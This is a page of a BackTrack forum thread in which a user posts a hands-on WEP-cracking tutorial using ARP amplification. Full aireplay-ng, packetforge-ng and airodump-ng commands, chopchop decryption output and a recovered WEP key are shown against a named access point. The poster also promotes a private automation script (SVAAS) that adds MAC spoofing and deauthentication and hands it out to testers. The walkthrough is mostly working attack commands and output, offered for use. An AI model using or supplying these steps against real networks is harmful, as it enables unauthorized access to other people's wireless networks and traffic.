Page 2 of 7 FirstFirst 1234 ... LastLast
Results 11 to 20 of 62

Thread: Tutorial: The art of ARP amplification

  1. #11
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default 1139 Packets per secs Injection !!!!!

    I FINALLY MANAGE ARP AMPLI 3X
    i manage to achieve near 1150pps !!!!! wich is more than 3X the packet rate with normal injection
    more than 30000 IVs in 30 secs......I love you xploitz......
    so yes my dream of seeing AIR injecting at 1200 pps is possible........
    fonction will be available in air beta 3 !!!


    here the specs of attack
    dest ip : client ip
    source ip : 10.255.255.255
    max inj rate : 1024 pps
    card rate : 36 M (at 54 i get nothing at aireplay-ng test....)

    here is the screen of airodump éééé



    have a look at running time compare to IVs .....;éééé

    i will try to make a vid tonight....
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  2. #12
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default Final Tutorial for arp Ampli 3x

    this is not a step by step newb tut, so i don't explain in details all steps because you are intended to know that before use that tut....


    1)
    WE SCAN FOR APS

    Code:
    bt ~ # iwlist scan
    lo        Interface doesn't support scanning.
    
    eth0      Interface doesn't support scanning.
    
    eth1      Scan completed :
              Cell 01 - Address: 00:1A:6B:04:9E:2F
                        ESSID:"Livebox-a5a3"
                        Protocol:IEEE 802.11bg
                        Mode:Master
                        Channel:10
                        Encryption key:on
                        Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 6 Mb/s; 9 Mb/s
                                  11 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
                                  48 Mb/s; 54 Mb/s
                        Quality=74/100  Signal level=-44 dBm  Noise level=-60 dBm
                        Extra: Last beacon: 48ms ago
    
    rausb0    Interface doesn't support scanning.
    we saw Livebox-a5a3 channel 10

    2) WE NOW PREPARE CARD FOR INJECTION
    Code:
    ifconfig rausb0 up; iwconfig rausb0 mode monitor channel 10 rate 1M
    iwpriv rausb0 forceprism 1
    iwpriv rausb0 rfmontx 1
    the last two commands are for rt73 only (it activate prism headers and injection)

    3) WE NOW TEST INJECTION
    Code:
    bt ~ # aireplay-ng --test rausb0 -B
    Interface rausb0 -> driver: Unknown
    23:43:35  rausb0 channel: 10
    23:43:35  Trying broadcast probe requests...
    23:43:35  Injection is working!
    23:43:36  Found 1 AP
    
    23:43:36  Trying directed probe requests...
    23:43:36  00:1A:6B:04:9E:2F - channel: 10 - 'Livebox-a5a3'
    23:43:37  Ping (min/avg/max): 3.208ms/28.342ms/51.995ms Power: 110.70
    23:43:37  30/30: 100%
    
    23:43:37  Trying directed probe requests for all bitrates...
    
    23:43:37  00:1A:6B:04:9E:2F - channel: 10 - 'Livebox-a5a3'
    23:43:38  Probing at 1.0 Mbps:  30/30: 100%
    23:43:39  Probing at 2.0 Mbps:  30/30: 100%
    Couldn't set rate to 5.5MBit. (54.0MBit instead)
    23:43:39  Probing at 6.0 Mbps:  29/30:  96%
    23:43:40  Probing at 9.0 Mbps:  30/30: 100%
    23:43:41  Probing at 11.0 Mbps: 30/30: 100%
    23:43:42  Probing at 12.0 Mbps: 30/30: 100%
    23:43:43  Probing at 18.0 Mbps: 30/30: 100%
    23:43:43  Probing at 24.0 Mbps: 29/30:  96%
    23:43:44  Probing at 36.0 Mbps: 30/30: 100%
    23:43:45  Probing at 48.0 Mbps: 28/30:  93%
    23:43:46  Probing at 54.0 Mbps: 23/30:  76%
    we see that the higher rate for 100 % hit is 36M/S
    so we set the rate of our card

    Code:
    iwconfig rausb0 rate 36M
    4)WE NOW SNIFF FOR A CLIENT
    Code:
    bt ~ # airodump-ng -c 10 --bssid 00:1A:6B:04:9E:2F rausb0
    
    CH 10 ][ Elapsed: 20 s ][ 2007-08-04 23:47
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ES
    
     00:1A:6B:04:9E:2F  109 100      197      109    0  10  54  WEP  WEP         L
    
     BSSID              STATION            PWR   Rate  Lost  Packets  Probes
    
     00:1A:6B:04:9E:2F  00:1B:77:32:4E:EF   84  54-54     0      120
    now we have
    AP MAC : 00:1A:6B:04:9E:2F
    CLIENT MAC : 00:1B:77:32:4E:EF
    AP CHAN : 10
    ESSID : Livebox-a5a3

    5)WE NOW DO A CHOPCHOP FOR DCRYPT IPS
    we limit packet size to 68(ARP Wireless)
    Code:
    bt ~ # aireplay-ng --chopchop -m 68 -n 68 -h 00:1B:77:32:4E:EF  -a 00:1A:6B:04:9E:2F rausb0
    Interface rausb0 -> driver: Unknown
    The interface MAC (00:18:F8:A4:DE:B7) doesn't match the specified MAC (-h).
            ifconfig rausb0 hw ether 00:1B:77:32:4E:EF
    Read 129 packets...
    
            Size: 68, FromDS: 0, ToDS: 1 (WEP)
    
                  BSSID  =  00:1A:6B:04:9E:2F
              Dest. MAC  =  FF:FF:FF:FF:FF:FF
             Source MAC  =  00:1B:77:32:4E:EF
    
            0x0000:  0841 2c00 001a 6b04 9e2f 001b 7732 4eef  .A,...k../..w2N.
            0x0010:  ffff ffff ffff 4047 6078 b500 021a 39ee  ......@G`x....9.
            0x0020:  6d7d 8b79 765c 90b9 62a0 4db5 1135 b9a6  m}.yv\..b.M..5..
            0x0030:  fb52 4682 4690 c506 8584 96e9 09a7 06fc  .RF.F...........
            0x0040:  8e0e 1f91                                ....
    
    Use this packet ? y
    
    Saving chosen packet in replay_src-0804-235136.cap
    
    23:51:46  Waiting for beacon frame (BSSID: 00:1A:6B:04:9E:2F)
    Offset   67 ( 0% done) | xor = 28 | pt = B9 |   20 frames written in    61ms
    Offset   66 ( 2% done) | xor = 3F | pt = 20 |  103 frames written in   309ms
    Offset   65 ( 5% done) | xor = D3 | pt = DD |  205 frames written in   615ms
    Offset   64 ( 8% done) | xor = 5B | pt = D5 |  103 frames written in   309ms
    Offset   63 (11% done) | xor = FD | pt = 01 |  100 frames written in   301ms
    Offset   62 (14% done) | xor = 07 | pt = 01 |  208 frames written in   624ms
    Offset   61 (17% done) | xor = 0F | pt = A8 |  205 frames written in   614ms
    Offset   60 (20% done) | xor = C9 | pt = C0 |  208 frames written in   624ms
    Offset   59 (23% done) | xor = E9 | pt = 00 |  100 frames written in   300ms
    Offset   58 (26% done) | xor = 96 | pt = 00 |  208 frames written in   623ms
    Offset   57 (29% done) | xor = 84 | pt = 00 |  309 frames written in   929ms
    Offset   56 (32% done) | xor = 85 | pt = 00 |  100 frames written in   300ms
    Offset   55 (35% done) | xor = 06 | pt = 00 |  208 frames written in   623ms
    Offset   54 (38% done) | xor = C5 | pt = 00 |  206 frames written in   618ms
    Offset   53 (41% done) | xor = 9C | pt = 0C |  103 frames written in   309ms
    Offset   52 (44% done) | xor = 47 | pt = 01 |  103 frames written in   309ms
    Offset   51 (47% done) | xor = 2A | pt = A8 |  207 frames written in   621ms
    Offset   50 (50% done) | xor = 86 | pt = C0 |  205 frames written in   615ms
    Offset   49 (52% done) | xor = BD | pt = EF |  103 frames written in   310ms
    Offset   48 (55% done) | xor = B5 | pt = 4E |  104 frames written in   310ms
    Offset   47 (58% done) | xor = 94 | pt = 32 |  100 frames written in   301ms
    Offset   46 (61% done) | xor = CE | pt = 77 |  309 frames written in   927ms
    Offset   45 (64% done) | xor = 2E | pt = 1B |  208 frames written in   625ms
    Offset   44 (67% done) | xor = 11 | pt = 00 |  310 frames written in   929ms
    Offset   43 (70% done) | xor = B4 | pt = 01 |  205 frames written in   615ms
    Offset   42 (73% done) | xor = 4D | pt = 00 |  103 frames written in   309ms
    Offset   41 (76% done) | xor = A4 | pt = 04 |  205 frames written in   614ms
    Offset   40 (79% done) | xor = 64 | pt = 06 |  103 frames written in   310ms
    Offset   39 (82% done) | xor = B9 | pt = 00 |  205 frames written in   615ms
    Offset   38 (85% done) | xor = 98 | pt = 08 |  313 frames written in   939ms
    Offset   37 (88% done) | xor = 5D | pt = 01 |  310 frames written in   929ms
    Offset   36 (91% done) | xor = 76 | pt = 00 |  100 frames written in   301ms
    Offset   35 (94% done) | xor = 7F | pt = 06 |  310 frames written in   930ms
    Offset   34 (97% done) | xor = 83 | pt = 08 |  206 frames written in   617ms
    
    Saving plaintext in replay_dec-0804-235205.cap
    Saving keystream in replay_dec-0804-235205.xor
    
    Completed in 18s (1.67 bytes/s)
    now we got a decrypted packet.....we open it in tcpdump
    Code:
    tcpdump -r replay_dec-0804-235205.cap
    reading from file replay_dec-0804-235205.cap, link-type IEEE802_11 (802.11)
    23:52:05.775485 arp who-has 192.168.1.1 tell 192.168.1.12
    now we get the client ip 192.168.1.12, it will be our destination adress for forging a new arp packetwe will use 10.255.255.255 for source adress

    6) FORGING SPECIAL ARP PACKET

    Code:
    bt ~ # packetforge-ng -0 -a 00:1A:6B:04:9E:2F  -h 00:1B:77:32:4E:EF  -k 192.168.1.12 -l 10.255.255.255 -w arprequest -y replay_dec-0804-235205.xor
    Wrote packet  to: arprequest
    7)REPLAY THIS PACKET
    Code:
    konsole -e aireplay-ng --interactive -x 1024 -r arprequest rausb0 & konsole -e airodump-ng -c 10 --bssid 00:1A:6B:04:9E:2F -w arpampli rausb0
    enjoy when you click yes your ivs flying....

    the results you will get grantly depends of distance to ap, pwr & rxq
    it will be between 600 & 1200 (i achieve 1139)

    1200 means enough iv to crack 128 key in 30 secs ......
    enjoy bros....
    hope you like it ...;
    edited i just capture more than 1million ivs in less than 14 minutes , who say better ???
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  3. #13
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default new private script

    for illustrate my tut on arp ampli i build this afternoon a little powerfull script

    first thing it's private so only my usuals testers can ask for it
    it's called SVAAS (Shaman Virtuel ARP Amplification Script)

    all is automagik, you will have to enter only the rate of your card when asking

    here are the steps of scripts

    1 - test injection
    2 - find good rates for injection
    3 - ask for the rate you want"
    4 - fix channel and rate of card
    5 - associate
    6 -launch chopchop limited to ARP wireless packet(68bytes) and a deauth process for speed things
    7 - analyse chopchop decrypted packet and extract IPs
    8 - Build ARP packet with good ips for amplification
    9 -launch a replay and airodump-ng to capture ivs
    10 - 30 secs after launch of aireplay-ng aircrack-ng begin
    11 - total running time is displayed at the end

    usage : svaas [APMAC] [CLIENTMAC] [CHANNEL] [NUMBER OF DEAUTH] [DEVICE]

    example : svaas 00:1A:6B:04:9E:2F 00:1B:77:32:4E:EF 9 10 rausb0

    the system will respond :

    Code:
    Welcome to Sh@m@nVirTuel's ARP Amplification Script
    Feel free to Contact me on R-E Forum
    
    VERIFY INJECTION CAPABILITY
    
    Interface rausb0 -> driver: Unknown
    22:01:17  rausb0 channel: 10
    22:01:17  Trying broadcast probe requests...
    22:01:17  Injection is working!
    
    PREPARING CARD FOR ATTACK
    
    Card locked on AP channel
    
    Trying to determine the best rate for this card
    ...
    
    Interface rausb0 -> driver: Unknown
     at 1.0 Mbps:   30/30: 100%
     at 2.0 Mbps:   30/30: 100%
     at 9.0 Mbps:   30/30: 100%
     at 11.0 Mbps:  30/30: 100%
     at 12.0 Mbps:  30/30: 100%
     at 18.0 Mbps:  30/30: 100%
    These rates are ok
    Choose your rate (type in number ie 1, 36, 54)
    18
    
    
    ASSOCIATION OF YOUR CARD
    
    Interface rausb0 -> driver: Unknown
    The interface MAC (00:18:F8:A4:DE:B7) doesn't match the specified MAC (-h).
            ifconfig rausb0 hw ether 00:1B:77:32:4E:EF
    22:01:35  Waiting for beacon frame (BSSID: 00:1A:6B:04:9E:2F)
    22:01:36  Sending Authentication Request
    22:01:37  Authentication successful
    22:01:37  Sending Association Request
    22:01:37  Association successful :-)
    
    CAPTURE OF AN ARP PACKET AND DECRYPT IP PROCESS
    
    Interface rausb0 -> driver: Unknown
    The interface MAC (00:18:F8:A4:DE:B7) doesn't match the specified MAC (-h).
            ifconfig rausb0 hw ether 00:1B:77:32:4E:EF
    Saving chosen packet in replay_src-0805-220152.cap
    
    22:01:52  Waiting for beacon frame (BSSID: 00:1A:6B:04:9E:2F)
    Offset   67 ( 0% done) | xor = 66 | pt = 1D |  224 frames written in   674ms
    Offset   66 ( 2% done) | xor = DF | pt = CC |   97 frames written in   291ms
    Offset   65 ( 5% done) | xor = 6C | pt = 8B |  102 frames written in   305ms
    Offset   64 ( 8% done) | xor = 1C | pt = D9 |  102 frames written in   307ms
    Offset   63 (11% done) | xor = 37 | pt = 01 |  204 frames written in   611ms
    Offset   62 (14% done) | xor = FF | pt = 01 |  309 frames written in   927ms
    Offset   61 (17% done) | xor = 70 | pt = A8 |  102 frames written in   305ms
    Offset   60 (20% done) | xor = 56 | pt = C0 |  203 frames written in   610ms
    Offset   59 (23% done) | xor = 97 | pt = 00 |  102 frames written in   306ms
    Offset   58 (26% done) | xor = 83 | pt = 00 |  102 frames written in   307ms
    Offset   57 (29% done) | xor = B3 | pt = 00 |  308 frames written in   923ms
    Offset   56 (32% done) | xor = 68 | pt = 00 |   99 frames written in   296ms
    Offset   55 (35% done) | xor = 5C | pt = 00 |  207 frames written in   621ms
    Offset   54 (38% done) | xor = 16 | pt = 00 |  203 frames written in   609ms
    Offset   53 (41% done) | xor = 02 | pt = 10 |  102 frames written in   306ms
    Offset   52 (44% done) | xor = A9 | pt = 01 |  101 frames written in   305ms
    Offset   51 (47% done) | xor = FD | pt = A8 |  204 frames written in   612ms
    Offset   50 (50% done) | xor = 32 | pt = C0 |  204 frames written in   612ms
    Offset   49 (52% done) | xor = E8 | pt = EF |   94 frames written in   280ms
    Offset   48 (55% done) | xor = AA | pt = 4E |  104 frames written in   314ms
    Offset   47 (58% done) | xor = 9A | pt = 32 |  101 frames written in   302ms
    Offset   46 (61% done) | xor = 21 | pt = 77 |  310 frames written in   931ms
    Offset   45 (64% done) | xor = 9C | pt = 1B |  204 frames written in   612ms
    Offset   44 (67% done) | xor = 8E | pt = 00 |  311 frames written in   932ms
    Offset   43 (70% done) | xor = 53 | pt = 01 |  206 frames written in   618ms
    Offset   42 (73% done) | xor = D1 | pt = 00 |  105 frames written in   314ms
    Offset   41 (76% done) | xor = EE | pt = 04 |  206 frames written in   620ms
    Offset   40 (79% done) | xor = A6 | pt = 06 |  105 frames written in   315ms
    Offset   39 (82% done) | xor = 51 | pt = 00 |  210 frames written in   628ms
    Offset   38 (85% done) | xor = 85 | pt = 08 |  310 frames written in   932ms
    Offset   37 (88% done) | xor = E8 | pt = 01 |  307 frames written in   920ms
    Offset   36 (91% done) | xor = 65 | pt = 00 |  311 frames written in   932ms
    Offset   35 (94% done) | xor = 69 | pt = 06 |  309 frames written in   928ms
    Offset   34 (97% done) | xor = 6C | pt = 08 |  203 frames written in   610ms
    
    Saving plaintext in replay_dec-0805-220212.cap
    Saving keystream in replay_dec-0805-220212.xor
    
    Completed in 19s (1.58 bytes/s)
    
    reading from file /root/replay_dec-0805-220212.cap, link-type IEEE802_11 (802.11)
    reading from file /root/replay_dec-0805-220212.cap, link-type IEEE802_11 (802.11)
    
    DETECTED ACCESS POINT IP : 192.168.1.1
    DETECTED CLIENT IP :  192.168.1.16
    
    BUILDING A NEW ARP PACKET
    
    DESTINATION IP :  192.168.1.16
    SOURCE IP : 10.255.255.255
    
    Wrote packet  to: /root/arprequest
    
    REASSOCIATION OF YOUR CARD
    
    Interface rausb0 -> driver: Unknown
    The interface MAC (00:18:F8:A4:DE:B7) doesn't match the specified MAC (-h).
            ifconfig rausb0 hw ether 00:1B:77:32:4E:EF
    22:02:12  Waiting for beacon frame (BSSID: 00:1A:6B:04:9E:2F)
    22:02:13  Sending Authentication Request
    22:02:14  Authentication successful
    22:02:14  Sending Association Request
    22:02:14  Association successful :-)
    
    REPLAY PROCESS OF NEW PACKET, we will also Capture Replies in /root/ARPAMPLI-01.ivs
    Automated Aircrack-ng process will be launch in 30 secs
    Please Wait....
    
    CRACKING PROCESS IN PROGRESS
    Opening /root/ARPAMPLI-01.ivs
    Attack will be restarted every 5000 captured ivs.
    Starting PTW attack with 21187 ivs.
    
                                                                                      Aircrack-ng 1.0 r634
    
    
                                                                      [00:00:26] Tested 153411 keys (got 30569 IVs)
    
       KB    depth   byte(vote)
        0   28/  1   C2(43776) 26(43520) 3C(43520) AF(43520) 33(43264) 6F(43264) B8(43264) EF(43264) C3(43008) E6(43008) EA(43008) ED(43008) 48(42752) 4B(42752)
        1    0/  1   43(58624) AF(46848) C9(46848) E7(46080) 45(45824) 23(45568) 97(45568) E0(45568) 2B(45056) 53(45056) A0(45056) EA(45056) CB(44800) E4(44800)
        2    2/  1   99(47872) 36(47104) 92(47104) 31(46592) 66(46592) 1C(46080) B1(46080) B5(45824) 3A(45568) 38(45312) 7A(45312) 32(45056) 9D(45056) DE(45056)
        3   22/  3   7E(44032) 2A(43776) 20(43520) 2B(43520) FB(43520) 5A(43264) A8(43008) 37(42752) 48(42752) 4F(42752) AA(42752) 01(42496) 69(42496) 85(42496)
        4   45/  4   BF(42496) 0D(42240) 29(42240) 2C(42240) 3B(42240) 7B(42240) 4E(41984) AC(41984) CA(41984) F3(41984) 01(41728) 6E(41728) 9E(41728) B9(41728)
    
    Failed. Next try with 25000 IVs.
    Starting PTW attack with 40276 ivs.
                 KEY FOUND! [ FA:49:26:DC:5A:E6:C9:F7:72:A5:DE:1E:2A ]
            Decrypted correctly: 100%
    
    
    
    Game Over
    We will now close Aireplay-ng and Airodump-ng windows
    
    HOPE YOU LIKE IT
    PM me on R-E forum for feedback or help
    
    AP Owned automagically in
    
    real    1m54.869s
    user    0m15.529s
    sys     0m10.377s
    Nice , no ?
    it's not designed to be the faster one, because of injection test and rate choosing process
    because of chopchop process wich can be long to sniff a 68b only packet.....but this is needed to decrypt easily ip in the script

    Those of my USUAL TESTERS, can ask for it, it's not public for the moment
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  4. #14
    Developer balding_parrot's Avatar
    Join Date
    May 2007
    Posts
    3,399

    Default

    I am sure that ANY of your usual testers would not object to you sending it to them in a PM

    NICE WORK YET AGAIN

  5. #15
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    i clean things on the code, cause it's a little bit crude

    i just add new option have a look last post i modified the usage line i add a "Deauth number" param

    i send it tomorrow
    btw feel free to have a look to codes... i really have phun and think it's well structured....
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  6. #16
    Developer balding_parrot's Avatar
    Join Date
    May 2007
    Posts
    3,399

    Default

    So your using my word now huh ?

    Looking forward to the PM already

  7. #17
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    PM sent Balding_Parrot Have Phun....
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  8. #18
    Developer balding_parrot's Avatar
    Join Date
    May 2007
    Posts
    3,399

    Default

    Thanks for the code.

    I didn't mean you had to send it before you were ready, only that I was looking forward to the PM when you send it tomorrow.

    Will PM you to let you know how it works for me, as soon as I get the chance.

    Thanks Shaman

    You know I am always happy to test your fantastic (dangerous ) scripts.

  9. #19
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    so i do some mods to the scripts

    i add auto macchanger to the client mac, because with the time i got "several deauth packets......" message and chopchop stop f.....ing all the script...

    i also rearrange the preparation part before attack here is the new initialization output

    Code:
    svaas 00:1A:6B:04:9E:2F 00:1B:77:32:4E:EF 10 7 rausb0
    
    Welcome to Sh@m@nVirTuel's ARP Amplification Script
    Feel free to Contact me on R-E Forum
    
    PREPARING CARD FOR ATTACK
    
    Current MAC: 00:1b:77:32:4e:ef (unknown)
    Faked MAC:   00:1b:77:32:4e:ef (unknown)
    It's the same MAC!!
    
    Monitor Mode set on rausb0
    
    Trying to determine the best rate for this card
    Please wait...
    Interface rausb0 -> driver: Unknown
     at 1.0 Mbps:   30/30: 100%
     at 6.0 Mbps:   30/30: 100%
     at 12.0 Mbps:  30/30: 100%
     at 18.0 Mbps:  30/30: 100%
     at 36.0 Mbps:  30/30: 100%
     at 54.0 Mbps:  30/30: 100%
    These rates are ok
    Choose your rate (type in number ie 1, 36, 54)
    54
    
    
    Card now locked on Channel 10
    Card now locked on Bitrate 54M
    
    VERIFY INJECTION CAPABILITY
    
    Interface rausb0 -> driver: Unknown
    02:37:53  rausb0 channel: 10
    02:37:53  Trying broadcast probe requests...
    02:37:53  Injection is working!
    Now it's really fonctionnal,
    i may add a driver switch to command line for accurate my macchanger and monitor method for ath drivers or other cards where ifconfig xx down ; macchanger --mac clientmac xx ; ifconfig xx up is not possible for changing mac
    and where iwconfig xx mode monitor is not enough (like ath)

    so for the moment there's card limitation
    if you can do
    ifconfig xx down ; macchanger --mac clientmac xx ; ifconfig xx up
    iwconfig xx mode monitor channel apchan rate xx

    well your card will be fully compatible with svaas

    New version ready but not already uploaded to the dl url i give for testers who request it ... please update in a few minutes to an hour
    =)
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  10. #20
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    Updated version available


    download from same url as the first one
    ....

    enjoy
    ....
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

Page 2 of 7 FirstFirst 1234 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •